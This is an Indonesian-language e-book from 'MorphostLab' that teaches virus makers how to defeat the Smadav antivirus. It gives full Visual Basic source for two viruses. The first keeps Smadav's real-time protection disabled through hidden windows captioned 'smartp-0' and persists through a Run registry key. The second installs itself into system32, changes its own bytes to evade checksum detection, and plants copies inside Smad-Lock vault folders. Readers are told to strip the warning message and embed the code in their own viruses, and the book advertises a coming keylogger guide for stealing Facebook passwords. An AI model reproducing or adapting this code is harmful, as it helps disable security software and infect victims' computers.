MorphostLab E-bookPress

Trik Baru Virus! Ancaman Bagi Smadav!

Morphic Karta
MorphostLab
MorphostLab E-BookPress

Bagian Satu
Bagaimana bisa terjadi? Sebenarnya ini adalah trik mudah. Kalau kamu sudah paham trik smartp-0 kamu sebenarnya tinggal menerapkannya pada virusmu. Dulu saya sempat berjalan-jalan ke forum kaskus, ternyata mereka sudah membahas trik ini. Di sana disebutkan bahwa jika ada folder smartp-0 dibuka maka RTP smadav akan mati. Ringkasnya begini: -kita buat satu folder smartp-0 di explorer -kemudian pastikan rtp smadav aktif. -lalu buka folder tersebut. -Dalam sekejap rtp smadav mati. Sebagian orang menyebutkan bahwa ini adalah trik exploitasi folder smartp-0. Saya tidak setuju. Ini bukan exploitasi folder smartp-0 tetapi exploitasi Caption smartp-0. RTP smadav bekerja dengan melihat caption smartp-0 untuk mengatur dirinya. Ini butuh mekanisme feedback yang dijalankan oleh timer tentunya. Begitu timer menemukan string caption smartp-0 maka timer yang ada di RTP berhenti bekerja. Interval timer yang digunakan kira-kira 100 sampai 1000. Dan paling tepat sekitar 500. Ini masih dugaan. Proses ini bisa dikerjakan cukup dengan satu timer saja. Sedangkan timer yang lain mengawasi explorer untuk menscan tiap folder yang baru dibuka. (itu pun kalau timer pemantau string smartp dengan timer pengawas virus dibedakan). Pemicu lainnya adalah tombol Activate. Tombol ini diduga berperan untuk mengaktifkan timer pemantau tadi sekaligus mengubah string caption sensitif tadi (smartp-0) menjadi string yang lain. Supaya timer pemantau tidak langsung disfungsi. Bisa dipastikan tombol Activate mengubah string caption sensitif tadi sebelum mengaktifkan timer pemantau dan proses ini membutuhkan waktu yang sangat cepat sebelum timer pemantau menghabiskan interval pertamanya. Ini semua masih dugaan. Kembali ke masalah caption smartp-0. Timer pemantau membaca semua caption aplikasi yang aktif baik itu caption tersembunyi maupun caption yang terlihat. Ini membuktikan kalau teori exploitasi folder smartp-0 runtuh dan yang benar adalah exploitasi caption smartp-0. Entah kenapa, tak satupun virus maker Indonesia yang terpikirkan hal ini. Dengan memanfaatkan caption smartp-0 di dalam project virusnya, RTP smadav akan mati.

MorphostLab E-BookPress

Nah, dengan berinisiatif saya membuat satu virus baru yang namanya (kalian sudah tahu apa namanya). Supaya kelemahan RTP ini segera dikoreksi.

MorphostLab E-BookPress

Bagian Dua
Kita masuk ke bagian coding Code virus Chantiqs sangat simpel. Meski simpel virus ini sudah merenggut banyak perhatian terutama di kalangan virus maker yang penasaran sekaligus pengamat virus. Disini saya butuh 6 form. Kenapa harus 6 form? Ada alasannya. Dan akan dijelaskan dibawah. Pemrograman untuk virus Chantiqs ini saya gunakan visualbasic. Selain mudah, user atau virus maker lainnya gampang ngerti untuk membuat virus tiruan ini.

Semua form saya beri caption smartp-0. Mulai dari form1 sampai form6.

MorphostLab E-BookPress

Setiap form-nya tambahkan satu timer. Timer inilah yang akan bersaing dengan timer pemantau RTP smadav sekaligus kecepatan tangan user mengklik tombol Activate Saya sadar kalau satu timer tidak cukup jadi saya butuh 6 timer untuk melawan RTP ini. Itu alasannya kenapa harus ada 6 form. Interval setiap timer yang ada di keenam form tadi berbeda-beda. Timer di form1 dan form2 nilainya 100 Timer di form3 dan form4 nilainya 250 Timer di form5 dan form6 nilainya 450 Hal ini harus dilakukan, supaya virus Chantiqs mampu mempertahankan kemenangannya secara konstan atas RTP smadav. Selain itu, dengan nilai interval yang berbeda ini RTP tidak mampu menemukan celah kosong di antara interval timer yang aktif setiap kelipatan intervalnya. Dengan kata lain, trik ini membuat seolah-olah RTP smadav disable secara permanent. Nah, berikut adalah source code yang harus diketik setiap formnya. Untuk form1
Private Sub Form_Load() Timer1.Enabled = True Me.Visible = False App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form2 Timer1.Enabled = False Unload Me End Sub

Untuk form2
Private Sub Form_Load() Me.Visible = False Timer1.Enabled = True App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form1 Timer1.Enabled = False Unload Me End Sub

Untuk form3
Private Sub Form_Load() Timer1.Enabled = True Me.Visible = False App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form4 Timer1.Enabled = False

MorphostLab E-BookPress

Unload Me End Sub

Untuk form4
Private Sub Form_Load() Timer1.Enabled = True Me.Visible = False App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form3 Timer1.Enabled = False Unload Me End Sub

Untuk form5
Private Sub Form_Load() Timer1.Enabled = True Me.Visible = False App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form6 Timer1.Enabled = False Unload Me End Sub

Untuk form6
Private Sub Form_Load() Timer1.Enabled = True Me.Visible = False App.TaskVisible = False End Sub Private Sub Timer1_Timer() Load Form5 Timer1.Enabled = False Unload Me End Sub

Lalu tambahkan satu module di project virusmu. Ketik code berikut:

'by Morphic Karta => Samuel Pola Karta '21 April 1991 Sub main() Dim b As Object Set b = CreateObject("wscript.shell") b.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\chantiqs", App.Path & "\" & App.EXEName & ".com" MsgBox "Smadav, you are dead, man! " & vbCrLf & "Fix your software!" & vbCrLf & "And Get Lost!" & vbCrLf & vbCrLf & "By: Chantiqs", vbCritical, "Chantiqs' Virus" Load Form1 Load Form3 Load Form5 End Sub

MorphostLab E-BookPress

Jangan lupa untuk mengatur startup object-nya. Ubah jadi Sub Main

Sampai tahap ini, virus Chantiqs selesai. Note: Untuk module virus diatas, hapus saja messagebox-nya.

MorphostLab E-BookPress

Bagian Tiga
Bagaimana cara menerapkannya pada virus anda? Tidak sulit penerapannya. Kamu bisa tambahkan semua code di atas ke dalam project virus kamu. Tapi ada cara lain selain cara itu. Kalau kamu menggabungkan project diatas ke dalam project virus kamu, tentunya form yang dibutuhkan jadi lebih banyak. Lalu virus kamu harus bekerja lebih sustain karena begitu banyaknya timer. Intinya, projectmu kelihatan lebih acak-acakan.. Jadi anjuran saya, selesaikan dulu virus di atas lalu jadikan sebagai aplikasi. Kemudian aplikasi virus tersebut masukkan ke virusmu. Boleh dengan VB Resource Editor (tidak akan saya jelaskan disini) atau boleh juga dengan menggandeng aplikasi virus tadi dalam satu folder dengan folder induk (tapi cara ini terlalu berisiko.) Baca note di halaman sebelumnya. Hapus messagebox yang ada di source saya. OK. Selamat mencoba!

MorphostLab E-BookPress

Bagian Empat
Bobol Smad-lock! Awalnya saya berpikiran apakah ada celah di smad-lock? Saya yakin mas Nafarin sendiri tahu bagaimana membolongi keamanan smad-lock. Kebetulan saya temukan cara untuk menyusup ke dalam smad-lock itu (saya yakin mas Nafarin tahu caranya. Dan beberapa VM lokal lain juga tahu bagaimana caranya), dan saya sudah buat satu sampel virus uji. Saya sebut namanya Morphirii-A. Si Morphirii bakal masuk menyusup ke dalam smad-lock. Mengcopykan dirinya ke dalam, lalu membuat satu pesan (satu file notepad) di dalamnya, sekaligus memodif file readme.txt yang ada di dalamnya. Dulu rencananya trik ini tidak akan aku sebarkan. Tapi setelah aku berpikir sana dan berpikir sini, ternyata toh suatu saat bakal ada juga orang yang tahu trik ini. Yah mudah-mudahan aja blog MorphostLab yang pertama kali ngepost trik ini. Setelah didesak banyak orang (mail-ku dibanjiri banyak email masuk), akhirnya trik ini akan saya bocorkan juga. Sekedar memenuhi permintaan pembaca dan pengunjung MorphostLab. Nah, sekarang buka VisualBasic-mu. Lalu masukkan referensi Microsoft Scripting Runtime. Perhatikan gambar dibawah ini.

Kemudian masukkan satu listbox ke dalam form. Namai listbox tersebut list1 Lalu ketikkan source berikut:
Private Declare Function GetLogicalDrives Lib kernel32 Alias GetLogicalDrives () As Long Dim fso As New Scripting.FileSystemObject Private Sub Form_Load() ambilDrive install

MorphostLab E-BookPress

regist End Sub Sub regist() Dim b As Object Set b = CreateObject(wscript.shell) b.regwrite HKLM\Software\microsoft\windows\currentversion\run\Morphirii, Environ$(windir) & \system32\Morphirii.exe End Sub Sub install() MutasiKe Environ$(windir) & \system32\morphirii.exe End Sub

Fungsi source diatas itu untuk menginstallkan diri ke dalam komputer korban dan membuat startup di regedit. Saya rasa semua sudah mengerti ini.
Function MutasiKe(Lokasi As String) If fso.FileExists(Lokasi) Then Exit Function ReDim KodeVirus(FileLen(App.Path & \ & App.EXEName & .exe)) As Byte Open App.Path & \ & App.EXEName & .exe For Binary As #1 Get #1, , KodeVirus Close #1 Open Lokasi For Binary As #1 Put #1, , KodeVirus Put #1, , Format(Time, hh:mm:ss) & & Format(Date, dd:mm) Close #1 End Function

Buat fungsi Mutasike untuk trik polymorphic. Trik ini fungsinya untuk menghindarkan diri dari pendeteksian checksum file seperti crc32 dan md5. Yang ini saya rasa juga pada ngerti semuanya. Setelah ini masukkan satu timer. Namai timer tersebut Timer1 dan berikut ini source untuk timer tersebut.
Private Sub Timer1_Timer() Dim i As Integer ambilDrive For i = 0 To List1.ListCount 1 If fso.FolderExists(List1.List(i) & ChrW(916) & Smad-Lock (Brankas Smadav) & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & Smad-Lock (Brankas Smadav) & ChrW(916) ElseIf fso.FolderExists(List1.List(i) & ChrW(916) & Smad-Lock & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & Smad-Lock & ChrW(916) End If Next End Sub

Si Timer akan melaksanakan kerjanya yaitu mengerjakan suatu trik yang kita sebut DoTrick. Untuk intervalnya bisa kalian set sendiri. Morphirii memakai interval 10000 (kira-kira 10 detik). Lihat source di atas, virus kita ini bakal mengecek 2 jenis smad-lock! Smad-lock yang bertulisan Brankas Smadav dan yang satunya lagi tidak bertuliskan Brankas smadav
Sub ambilDrive() On Error Resume Next Dim LDs As Long, lng As Long, sDrives As String

MorphostLab E-BookPress

LDs = GetLogicalDrives For lng = 0 To 25 If (LDs And 2 ^ lng) 0 Then List1.AddItem Chr(lng + 65) & :\ End If Next lng End Sub

Code ini fungsinya untuk mencari drive-drive yang aktif. Code ini bisa diganti dengan yang code lebih baik.
Function DoTrick(drive As String) fso.CopyFolder drive, App.Path & \Hajar Open App.Path & \Hajar\Read Me.txt For Output As #1 Print #1, Smad-Lock ini berhasil disusupi oleh Morphirii Close #1 Open App.Path & \Hajar\Morphirii.txt For Output As #1 Print #1, Smad-Lock tidak lagi aman Print #1, Smad-Lock ini berhasil disusupi oleh Morphirii Print #1, Print #1, Morphirii by: Morphic Print #1, File ini bukan 100% virus Print #1, hanya untuk uji antivirus anak bangsa Close #1 MutasiKe App.Path & \Hajar\Morphirii_2010.exe fso.CopyFolder App.Path & \Hajar, drive, True fso.DeleteFolder App.Path & \Hajar End Function

Ini adalah trik yang kita maksud. Morphirii akan mengcopykan dirinya ke dalam smad-lock, dan membuat satu file notepad di dalamnya sekaligus memodif file readme.txt yang ada di dalamnya. Kalau kamu mau menghapus smad-lock-nya mudah saja. Codenya begini:
Fso.DeleteFolder (List1.List(i) & ChrW(916) & Smad-Lock (Brankas Smadav) & ChrW(916)) Atau Fso.deletefolder List1.List(i) & ChrW(916) & Smad-Lock & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & Smad-Lock & ChrW(916)

Itupun setelah dilakukan pengecekan drive oleh Listbox yang tadi supaya tidak terjadi kacau balau ya Untuk penghapusan folder autorun.inf bisa dengan trik ini:
Sub hapusAuto(Dirname as strign) On Error Resume Next Shell (CMD /C RD /S /Q \\.\\ & Chr(32) & Chr(34) & DirName & Chr(34)), vbHide End Sub

Jadi untuk menghapus folder F:\autorun.inf codenya menjadi

hapusAuto F:\autorun.inf

MorphostLab E-BookPress

Bagian Lima
Anggap sudah selesai! Untuk e-book kali ini saya rasa sudah cukup. Sebenarnya masih ada pembahasan lainnya seperti trik penghindaran diri dari smad-behavior dan smad-reader. Mungkin lain kali akan kita bahas. Tidak ada salahnya kalau kamu menyebarluaskan e-book ini secara gratis ke teman-teman. E-book ini kamu dapatkan secara cuma-cuma jadi dilarang mengambil keuntungan dari e-book ini. Tidak lupa saya juga minta maaf pada pihak yang bersangkutan dengan antivirus yang sedang dibahas di atas. Tidak ada maksud tertentu, semua ini hanya untuk melampiaskan semua ide yang ada di otak. Semoga e-book ini bermanfaat. Terima kasih By: Morphic Karta Thanks to: -Lidia Giritri Bangun (mesti aku bayar royalti untuk nama Chantiqs? Hahaha)

Link teman: - http://safe-computing.co.cc (SatryaCode Medan) - http://yudha-arch.blogspot.com (Yudha Jakarta) - http://antivirii.co.cc (Shafry Kepanjen) - http://kudosoft.co.nr (Muamar Kudo PurbaLingga) - http://morphostlab.co.nr

MorphostLab E-BookPress

Biografi Morphic
Samuel Pola Karta Sembiring. Lahir di Medan tanggal 21 April 1991. Sekarang aktif menjadi mahasiswa semester dua Fakultas Kedokteran Universitas Sumatera Utara dan baru saja menjadi alumni SMA Negeri 1 Medan. Sejak kecil tidak menyukai bidang IT dan semua waktunya dihabiskan untuk bermain musik, menggambar dan menulis novel. Menguasai pemrograman Visual Basic 6, Visual Basic Net, Macro Word, Visual Basic Script saat duduk di bangku kelas 1 SMA. Semuanya dikuasai secara otodidak. Tidak ada motivasi dan tidak ada maksud tertentu untuk mempelajari itu semua. Semuanya itu dilakukan hanya untuk memenuhi kesenangan isengnya saja. Kini dia aktif menjadi pimpinan MorphostLab, administrator di Morphorum, dan menjabat moderator yang memegang dua bagian sekaligus di Virologi Indonesia. Remaja yang bercita-cita menjadi dokter ini juga aktif menulis banyak artikel dan tutorial virus maupun antivirus yang sudah banyak beredar di hampir semua web virologist Indonesia. Ketertarikannya pada malware mulai muncul saat masih di SMP dan mulai aktif membuatnya saat masuk sekolah SMA-nya. Sedangkan pembuatan antivirus Morphost dimulai pada semester dua dan diselesaikannya selama dua setengah tahun. Informasi lebih lanjut mengenai Morphic bisa didapat dari: Blog: http://www.morphostlab.co.nr Forum: http://www.morphorum.co.nr Email: karta_morphic@yahoo.co.id Facebook: Morphic Karta

MorphostLab E-BookPress

Judul Ebook Total Halaman Penulis Untuk

= How To Be A Good Malware Analyst = 33 Halaman = Morphic Karta = Semua Kalangan

Judul Ebook Total Halaman Penulis Untuk

= Metabolisme Lemak = 10 halaman = Samuel Pola Karta = Mahasiswa kedokteran

Judul E-book Total Halaman Penulis Untuk

= Trik Baru Virus! Ancaman Bagi Smadav! = 14 halaman = Morphic Karta = Semua kalangan

E-book selanjutnya: - Panen password Facebook dengan Keylogger Buatan!

MorphostLab E-BookPress